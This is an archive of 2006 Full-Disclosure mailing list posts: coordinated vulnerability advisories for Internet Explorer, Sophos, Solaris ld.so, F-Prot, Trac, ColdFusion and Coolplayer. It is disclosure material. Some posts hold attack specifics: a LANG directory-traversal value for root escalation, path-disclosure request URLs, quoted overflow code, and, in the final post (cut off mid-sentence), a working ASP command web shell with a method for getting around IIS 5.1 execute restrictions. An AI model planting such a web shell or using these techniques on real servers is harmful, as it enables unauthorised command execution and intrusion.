prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From zdi-disclosures at 3com.com Tue Dec 12 19:03:38 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 12 Dec 2006 11:03:38 -0800 Subject: [Full-disclosure] ZDI-06-048: Microsoft Internet Explorer normalize() Function Memory Corruption Vulnerability Message-ID: ZDI-06-048: Microsoft Internet Explorer normalize() Function Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-048.html December 12, 2006 -- CVE ID: CVE-2006-5581 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 6 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since February 27, 2006 by pre-existing Digital Vaccine protection filter IDs 4163, 3133, 3377. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific vulnerability exists due to improper handling of the normalize() function. When called in certain circumstances user controllable memory can be used to execute arbitrary code. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/Bulletin/MS06-072.mspx -- Disclosure Timeline: 2006.02.27 - Pre-existing digital Vaccine released to TippingPoint customers 2006.08.31 - Vulnerability reported to vendor 2006.12.12 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Sam Thomas. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From zdi-disclosures at 3com.com Tue Dec 12 18:52:49 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Tue, 12 Dec 2006 10:52:49 -0800 Subject: [Full-disclosure] ZDI-06-045: Sophos Anti-Virus CPIO Archive Parsing Buffer Overflow Vulnerability Message-ID: ZDI-06-045: Sophos Anti-Virus CPIO Archive Parsing Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-045.html December 12, 2006 -- CVE ID: CVE-2006-6335 -- Affected Vendor: Sophos -- Affected Products: All versions of Sophos Anti-Virus < v2.40 scanning engine -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since December 12, 2006 by Digital Vaccine protection filter ID 4918. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Anti-Virus. The specific flaw exists in the parsing of CPIO archives. When a long non-null terminated filename is processed by veex.dll, a stack overflow occurs. Exploitation is possible leading to remote code execution running under the SYSTEM context. -- Vendor Response: Sophos has issued an update to correct this vulnerability. More details can be found at: http://www.sophos.com/support/knowledgebase/article/17340.html -- Disclosure Timeline: 2006.09.14 - Vulnerability reported to vendor 2006.12.12 - Digital Vaccine released to TippingPoint customers 2006.12.12 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From labs-no-reply at idefense.com Tue Dec 12 19:31:08 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Tue, 12 Dec 2006 14:31:08 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.12.06: Sun Microsystems Solaris ld.so 'doprf()' Buffer Overflow Vulnerability Message-ID: <457F037C.6010905@idefense.com> Sun Microsystems Solaris ld.so 'doprf()' Buffer Overflow Vulnerability iDefense Security Advisory 12.12.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 12, 2006 I. BACKGROUND Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at http://www.sun.com/software/solaris/ II. DESCRIPTION Local exploitation of a buffer overflow vulnerability in ld.so could potentially allow a non root user to execute arbitrary code as root. ld.so is vulnerable to a buffer overflow in its internal doprf() formatting function. A fixed size stack buffer is used to store the precision padding characters when printing out a numerical format specifier. The vulnerable code was taken from the OpenSolaris source, and is as follows: size_t doprf(const char *format, va_list args, Prfbuf *prf) { char c; char *bp = prf->pr_cur; char *bufend = prf->pr_buf + prf->pr_len; size_t bufsiz = prf->pr_len; while ((c = *format++) != '\0') { if (c != '%') { PUTC(c); } else { int base = 0, flag = 0, width = 0, prec = 0; size_t _i; int _c, _n; char *_s; int ls = 0; * snip * if (base) { 1] char local[20]; const char *string = MSG_ORIG(MSG_STR_HEXNUM); size_t ssize = 0, psize = 0; const char *prefix = MSG_ORIG(MSG_STR_EMPTY); u_longlong_t num; * snip * /* * Convert the numeric value into a local * string (stored in reverse order). */ _s = local; 2] do { *_s++ = string[num % base]; num /= base; ssize++; } while (num); /* * Provide any precision or width padding. */ if (prec) { /* LINTED */ _n = (int)(prec - ssize); 3] while (_n-- > 0) { *_s++ = '0'; ssize++; } } 1) This is the stack buffer that will later be overflowed. 2) Here the given number is stored into the buffer. There is no chance for an overflow here as the maximum number of digits in a long long int is 20 bytes. 3) However in this loop an attacker can freely overwrite the stack with '0' (0x30) bytes. This vulnerability would normally not be able to be triggered by a non root user. The doprf() function is only supposed to be passed format strings from a message file owned by root. However, when this vulnerability is combined with the ld.so directory traversal vulnerability any user can pass arbitrary format strings to the doprf() function. III. ANALYSIS Successful local exploitation allows an attacker to execute arbitrary code as root on the affected host by running a setuid binary. Exploitation is difficult due to the limited data value with which the buffer can be overflowed. It is necessary to have valid memory mapped at an address with a most significant byte of 0x30, for example 0x30fffff0. In our tests on both x86 and SPARC architectures we were unable to achieve this. With a different memory layout exploitation may be possible. On x86, it also may be possible to overwrite the low byte of a saved frame pointer if the registers are allocated in a different way. IV. DETECTION iDefense has confirmed that Solaris 10 for both x86 and SPARC is vulnerable. Older versions of Solaris are likely to be vulnerable as well. V. WORKAROUND iDefense is unaware of any effective workarounds for this issue. VI. VENDOR RESPONSE Sun Microsystems has addressed this problem with new patches. More information can be found in Sun Alert #102724. This alert can be found at: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102724-1 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/24/2006 Initial vendor notification 10/27/2006 Initial vendor response 12/12/2006 Coordinated public disclosure IX. CREDIT Sean Larsson (iDefense Labs) is credited with the discovery of this vulnerability. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Tue Dec 12 19:31:20 2006 From: labs-no-reply at idefense.com (iDefense Labs) Date: Tue, 12 Dec 2006 14:31:20 -0500 Subject: [Full-disclosure] iDefense Security Advisory 12.12.06: Sun Microsystems Solaris ld.so Directory Traversal Vulnerability Message-ID: <457F0388.1040503@idefense.com> Sun Microsystems Solaris ld.so Directory Traversal Vulnerability iDefense Security Advisory 12.12.06 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 12, 2006 I. BACKGROUND Solaris is a UNIX operating system developed by Sun Microsystems. More information can be found at http://www.sun.com/software/solaris/ II. DESCRIPTION Local exploitation of a directory traversal vulnerability in ld.so could potentially allow a non root user to execute arbitrary code as root. ld.so uses the environmental variables LANG, LC_ALL, and LC_MESSAGES to determine what locale is currently set. When ld.so encounters an error, such as when a non root user specifies an unsafe library in the LD_PRELOAD environmental variable, it uses one of the above variables to open up a message file that contains error strings. It will make a call like this to open the file: open("/usr/lib/locale/$LANG/LC_MESSAGES/SUNW_OST_SGS.mo",..) $LANG is a user controlled environmental variable that is not sanitized. This message file is meant to contain format strings used to build error messages, and should therefore only be writable by root. By setting LANG to a value such as "../../../../../home/user" an attacker can control the the location of this message file, and pass arbitrary format strings to a printf() like function in ld.so. III. ANALYSIS Successful local exploitation allows attackers to execute arbitrary code as root on the affected host. ld.so does not use the C library printf() function; it has it's own minimal implementation. This implementation does not provide the %n format specifier. Therefore an attacker is limited to leaking information through such specifiers as %x. However, while researching this vulnerability it was found that the formatting function itself also contains a buffer overflow vulnerability that can be triggered with a user controlled format string. This vulnerability is discussed in a separate iDefense advisory. By combining these two vulnerabilities it is possible that an attacker could execute arbitrary code as root. IV. DETECTION iDefense has confirmed that Solaris 10 for both x86 and SPARC is vulnerable. It is speculated that older versions of Solaris are vulnerable as well. V. WORKAROUND iDefense is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Sun Microsystems has addressed this problem with new patches. More information can be found in Sun Alert #102724. This alert can be found at: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102724-1 VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 10/24/2006 Initial vendor notification 10/27/2006 Initial vendor response 12/12/2006 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2006 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From alerts at integrigy.com Tue Dec 12 19:10:44 2006 From: alerts at integrigy.com (Integrigy Alerts) Date: Tue, 12 Dec 2006 13:10:44 -0600 Subject: [Full-disclosure] Evading Oracle Database IDS and Auditing Solutions Message-ID: <009501c71e21$390fa870$3602a8c0@integrigy.com> More and more Oracle Database customers are implementing IDS and auditing solutions to satisfy legislative requirements like SOX and HIPAA. Often these tools are implemented with little testing or awareness that there are potentially multiple techniques that can easily be used to evade these solutions. To highlight this issue, Integrigy has developed a short paper on the topic to help people evaluate the effectiveness of their Oracle IDS implementations. The paper focuses on Snort and signature based products, but should be applicable to other types of IDS and Oracle specific solutions. This paper expands on three evasion techniques previously described by Joxean Koret in his paper "Oracle Database IDS Evasion Techniques for SQL*Net" with a number of new techniques and some variations on Joxean's techniques. Joxean's paper can be found at - http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0593.html The Integrigy whitepaper can be found at - http://www.integrigy.com/security-resources/whitepapers/evade-oracle-ids Hope this helps. Stephen Kost - Integrigy From remove-vuln at secunia.com Tue Dec 12 20:04:29 2006 From: remove-vuln at secunia.com (Secunia Research) Date: Tue, 12 Dec 2006 21:04:29 +0100 Subject: [Full-disclosure] Secunia Research: Internet Explorer Script Error Handling Memory Corruption Message-ID: <1165953869.3103.0.camel@ts3.intnet> ====================================================================== Secunia Research 12/12/2006 - Internet Explorer Script Error Handling Memory Corruption - ====================================================================== Table of Contents Affected Software....................................................1 Severity.............................................................2 Description of Vulnerability.........................................3 Solution.............................................................4 Time Table...........................................................5 Credits..............................................................6 References...........................................................7 About Secunia........................................................8 Verification.........................................................9 ====================================================================== 1) Affected Software Microsoft Internet Explorer 6.0 ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Internet Explorer, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error within the exception handling of script errors. This can be exploited to corrupt memory via an HTML document containing specially crafted JavaScript that triggers certain errors simultaneously. Successful exploitation allows execution of arbitrary code. ====================================================================== 4) Solution Apply patches (see the vendor's advisory for details). ====================================================================== 5) Time Table 15/08/2006 - Vendor notified. 15/08/2006 - Vendor response. 12/12/2006 - Public disclosure. ====================================================================== 6) Credits Discovered by Jakob Balle and Carsten Eiram, Secunia Research. ====================================================================== 7) References MS06-072 (KB925454): http://www.microsoft.com/technet/security/Bulletin/MS06-072.mspx The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-5579 for the vulnerability. ====================================================================== 8) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://corporate.secunia.com/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://corporate.secunia.com/secunia_research/33/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/secunia_vacancies/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ ====================================================================== 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-58/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ====================================================================== From announce-noreply at rpath.com Tue Dec 12 17:24:53 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 12 Dec 2006 12:24:53 -0500 Subject: [Full-disclosure] rPSA-2006-0230-1 evince Message-ID: <457ee5e5.xE5j7lTMvfhxPL2X%announce-noreply@rpath.com> rPath Security Advisory: 2006-0230-1 Published: 2006-12-12 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: evince=/conary.rpath.com at rpl:devel//1/0.4.0-10.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5864 https://issues.rpath.com/browse/RPL-850 Description: Previous versions of the evince package contain a vulnerability that enables attackers to provide intentionally malformed postscript files which will cause evince to execute arbitrary attacker-provided code. (This vulnerability was originally discovered in the gv program.) From announce-noreply at rpath.com Tue Dec 12 17:25:23 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 12 Dec 2006 12:25:23 -0500 Subject: [Full-disclosure] rPSA-2006-0231-1 squirrelmail Message-ID: <457ee603.of80KJaS/+W/iYEH%announce-noreply@rpath.com> rPath Security Advisory: 2006-0231-1 Published: 2006-12-12 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Weakness Updated Versions: squirrelmail=/conary.rpath.com at rpl:devel//1/1.4.9a-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6142 https://issues.rpath.com/browse/RPL-849 Description: Previous versions of the squirrelmail package are vulnerable to multiple cross-site scripting (XSS) attacks that allow the attacker to subvert web browsers being used with squirrelmail. From jaervosz at gentoo.org Tue Dec 12 21:57:36 2006 From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen) Date: Tue, 12 Dec 2006 22:57:36 +0100 Subject: [Full-disclosure] [ GLSA 200612-12 ] F-PROT Antivirus: Multiple vulnerabilities Message-ID: <200612122257.41114.jaervosz@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: F-PROT Antivirus: Multiple vulnerabilities Date: December 12, 2006 Bugs: #157612 ID: 200612-12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== F-Prot Antivirus contains a buffer overflow and other unspecified vulnerabilities, possibly allowing the remote execution of arbitrary code. Background ========== F-Prot Antivirus is a FRISK Software antivirus program that can used with procmail. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-antivirus/f-prot < 4.6.7 >= 4.6.7 Description =========== F-Prot Antivirus version 4.6.7 fixes a heap-based buffer overflow, an infinite loop, and other unspecified vulnerabilities. Impact ====== Among other weaker impacts, a remote attacker could send an e-mail containing a malicious file that would trigger the buffer overflow vulnerability and execute arbitrary code with the privileges of the user running F-Prot, which may be the root user. Workaround ========== There is no known workaround at this time. Resolution ========== All F-Prot users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-antivirus/f-prot-4.6.7" References ========== [ 1 ] CVE-2006-6293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6293 [ 2 ] CVE-2006-6294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6294 [ 3 ] CVE-2006-6352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6352 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-12.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061212/29d04a99/attachment.bin From jaervosz at gentoo.org Tue Dec 12 22:13:37 2006 From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen) Date: Tue, 12 Dec 2006 23:13:37 +0100 Subject: [Full-disclosure] [ GLSA 200612-13 ] libgsf: Buffer overflow Message-ID: <200612122313.38373.jaervosz@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: libgsf: Buffer overflow Date: December 12, 2006 Bugs: #156693 ID: 200612-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== libgsf improperly allocates memory allowing for a heap overflow and possibly the execution of arbitrary code. Background ========== The GNOME Structured File Library is an I/O library that can read and write common file types and handle structured formats that provide file-system-in-a-file semantics. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 gnome-extra/libgsf < 1.14.2 >= 1.14.2 Description =========== "infamous41md" has discovered that the "ole_init_info" function may allocate too little memory for storing the contents of an OLE document, resulting in a heap buffer overflow. Impact ====== An attacker could entice a user to open a specially crafted OLE document, and possibly execute arbitrary code with the rights of the user opening the document. Workaround ========== There is no known workaround at this time. Resolution ========== All libgsf users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=gnome-extra/libgsf-1.14.2" References ========== [ 1 ] CVE-2006-4514 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4514 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-13.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061212/99baf6a4/attachment.bin From jaervosz at gentoo.org Tue Dec 12 22:28:12 2006 From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen) Date: Tue, 12 Dec 2006 23:28:12 +0100 Subject: [Full-disclosure] [ GLSA 200612-14 ] Trac: Cross-site request forgery Message-ID: <200612122328.13544.jaervosz@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low Title: Trac: Cross-site request forgery Date: December 12, 2006 Bugs: #154574 ID: 200612-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Trac allows remote attackers to execute unauthorized actions as other users. Background ========== Trac is a wiki and issue tracking system for software development projects. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-apps/trac < 0.10.1 >= 0.10.1 Description =========== Trac allows users to perform certain tasks via HTTP requests without performing correct validation on those requests. Impact ====== An attacker could entice an authenticated user to browse to a specially crafted URL, allowing the attacker to execute actions in the Trac instance as if they were the user. Workaround ========== There is no known workaround at this time. Resolution ========== All Trac users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/trac-0.10.1" References ========== [ 1 ] CVE-2006-5848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5848 [ 2 ] CVE-2006-5878 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5878 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-14.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061212/a7af8b6e/attachment.bin From dbounds at gmail.com Tue Dec 12 14:33:35 2006 From: dbounds at gmail.com (Darren Bounds) Date: Tue, 12 Dec 2006 09:33:35 -0500 Subject: [Full-disclosure] [SBDA] - ColdFusion MX7 - Multiple Vulnerabilities In-Reply-To: <3F6918F2F2125C4BB95462A2ED1454B10DE826@pukeko.smb2go.net> References: <3F6918F2F2125C4BB95462A2ED1454B10DE826@pukeko.smb2go.net> Message-ID: <26563eca0612120633o3cc9345fp6c7b1d9450bf46af@mail.gmail.com> Brett, With regard to the first item, you realize that this item is completely mitigated when a global error handler is defined, correct? Without a global error handler, there's a hell of a lot more information than that what you've mentioned available for the picking. This is very well documented. Darren On 12/10/06, Brett Moore wrote: > Just clearing stuff out before Christmas. > > ======================================================================== > = ColdFusion MX7 - Multiple Vulnerabilities > = > = Vendor Website: > = http://www.Adobe.com > = > = Affected Software: > = ColdFusion MX7 (and possibly MX6) > = > = Public disclosure on Monday December 11, 2006 > ======================================================================== > > == Overview == > > This advisory discloses three separate security issues in ColdFusion > MX7. > > * Server Path Disclosure * > > It is possible to cause the server to disclose the local path by making > an invalid request. This information could be used to aide in other file > or path based attacks. > > The request must be for an existing file, that has an extension not > handled by the web server. (ie: not asp,aspx). > > The request must be terminated with either of the following; > /.jws > /.cfm > /.cfml > /.cfc > > Some example requests are; > http://serverip/page1.htm/a.cfm > http://serverip/CFIDE/administrator/analyzer/img/minus.gif/a.cfm > http://serverip/jrunscripts/jrun.ini/a.cfm > http://serverip/jrunscripts/jrunserver.store/a.cfm > http://serverip/jrunscripts/readme.txt/a.cfm > > This has been confirmed against installs that do NOT have debugging or > robust exception information turned on. > > Sending a request in this format returns a message similar to; > Error parsing the Tag Library Descriptor > file:/d:/sekretpath/hidden/page1.htm/.. > > * Internal IP Address Disclosure * > > It is possible to cause the server to disclose the internal network IP > address of the host. This information could be used to aide in other > network based attacks. > > Making a request to the /CFIDE/administrator/login.cfm page WITHOUT > supplying a host, will result in the internal IP address of the > server to be disclosed as part of an href tag. > > ------------------------------------------------------------------ > GET /CFIDE/administrator/login.cfm HTTP/1.0 > > > HTTP/1.1 200 OK > Server: Microsoft-IIS/5.1 > Date: Thu, 09 Nov 2006 05:44:02 GMT > > > > href="http://INTERNALADDRESS:80/CFIDE/administrator/favicon.ico"> > > ------------------------------------------------------------------ > > * Cross Site Scripting Protection Bypass * > > ColdFusion MX7 appears to have built in protection against cross > site scripting attacks, and will replace > > By inserting a %00 within the > > == Solutions == > > Currently, the issues outlined in the report are being considered for > the next major version of ColdFusion - the release date is currently not > > finalized. There is currently no plan to release security bulletins for > any of the issues from the report > > == Credit == > > Discovered and advised to Adobe November 11, 2006 by Brett Moore of > Security-Assessment.com > > == About Security-Assessment.com == > > Security-Assessment.com is Australasia's leading team of Information > Security consultants specialising in providing high quality Information > Security services to clients throughout the Asia Pacific region. Our > clients include some of the largest globally recognised companies in > areas such as finance, telecommunications, broadcasting, legal and > government. Our aim is to provide the very best independent advice and > a high level of technical expertise while creating long and lasting > professional relationships with our clients. > > Security-Assessment.com is committed to security research and > development, and its team continues to identify and responsibly publish > vulnerabilities in public and private software vendor's products. > Members of the Security-Assessment.com R&D team are globally recognised > through their release of whitepapers and presentations related to new > security research. > > Security-Assessment.com is an Endorsed Commonwealth Government of > Australia supplier and sits on the Australian Government > Attorney-General's Department Critical Infrastructure Project panel. > We are certified by both Visa and MasterCard under their Payment > Card Industry Data Security Standard Programs. > -- Thank you, Darren Bounds From admin at zone-h.fr Wed Dec 13 05:47:53 2006 From: admin at zone-h.fr (Siegfried) Date: Wed, 13 Dec 2006 06:47:53 +0100 (CET) Subject: [Full-disclosure] Coolplayer buffer overflow vulnerabilities Message-ID: <20637.88.149.150.1.1165988873.squirrel@webmail.zone-h.fr> Affected software: Coolplayer (coolplayer.sourceforge.net) Versions: <= 215 Discovered by: Mehdi Oudad and Kevin Fernandez, zone-h.fr The coolplayer authors have been mailed through contact _\at/_ daansystems. com on november 15 2005 but we never got any reply. On november 30 2006 they published a new version that somewhat patches the flaws. 1) A boundary error exists in the CPL_AddPrefixedFile() function of CPI_Playlist.c : char cFullPath[MAX_PATH]; memcpy(cFullPath, pcPlaylistFile, iPlaylist_VolumeBytes); strcpy(cFullPath + iPlaylist_VolumeBytes, pcFilename + 1); CPL_AddSingleFile(hPlaylist, cFullPath, pcTitle); The program tries to put a 512 input string into a 260 buffer. This can be exploited via a malicious playlist file containing overly long song names. 2) A boundary error exists in the main_skin_check_ini_value() function of skin.c : sscanf(textposition, "%s %d %d %d %d %d %d %d %d %d %[^\0]", name, &x, &y, &w, &h, &maxw, &x2, &y2, &w2, &h2, tooltip); It can be exploited with a skin file containing overly long button names. 3) An error in main_skin_open() of skin.c can be exploited with a skin file containing overly long bitmap filenames. Additionally coolplayer was using an obsolete version of the zlib library, the changelog doesn't say it is updated. From brett.moore at security-assessment.com Wed Dec 13 02:03:04 2006 From: brett.moore at security-assessment.com (Brett Moore) Date: Wed, 13 Dec 2006 15:03:04 +1300 Subject: [Full-disclosure] ASP Cmd Shell On IIS 5.1 Message-ID: <3F6918F2F2125C4BB95462A2ED1454B10DE955@pukeko.smb2go.net> ======================================================================== ==== % ASP Cmd Shell On IIS 5.1 % brett.moore at security-assessment.com ======================================================================== ==== ASP shells have been around since the dawn of time. On IIS 5.0 and prior it was simple to create a 'command prompt shell' using code similar to; <% Set oS = Server.CreateObject("WSCRIPT.SHELL") output = oS.exec("cmd.exe > /c " & request("command")).stdout.readall response.write output %> Permissions changes in IIS 5.1 prevented this method from working as execution access was revoked to the IUSR_Machine user. During one boring afternoon it was decided to find a way around this, and what we found was 'slightly' interesting. When IIS checks to see if an executable has 'execute' rights it is checking against IUSR_Machine. If execute rights are granted then the new process is created, under the IWAM_Machine account. Thus all that was needed was an executable that could be run by IUSR_Machine and would then spawn an instance of cmd.exe. We set about seeing what executables could be run by IUSR_Machine. It turns out that execution access has been revoked to all files with the .exe extension. We did however locate several .com files that could still be executed. One in particular 'win.com' takes a command line as a parameter and will execute it. Because of the 'double spawning' we can not make use of .stdout.readall, and need to revert to outputting to a file, and reading it back in. Due to the process executing under a different account than that of the ASP processor, we need to jump through a couple of hoops. * The folder that we use must be WRITEABLE by IWAM_Machine * The folder that we use must be READABLE by IUSR_Machine * We need to alter file permissions to allow IUSR_Machine access to read the 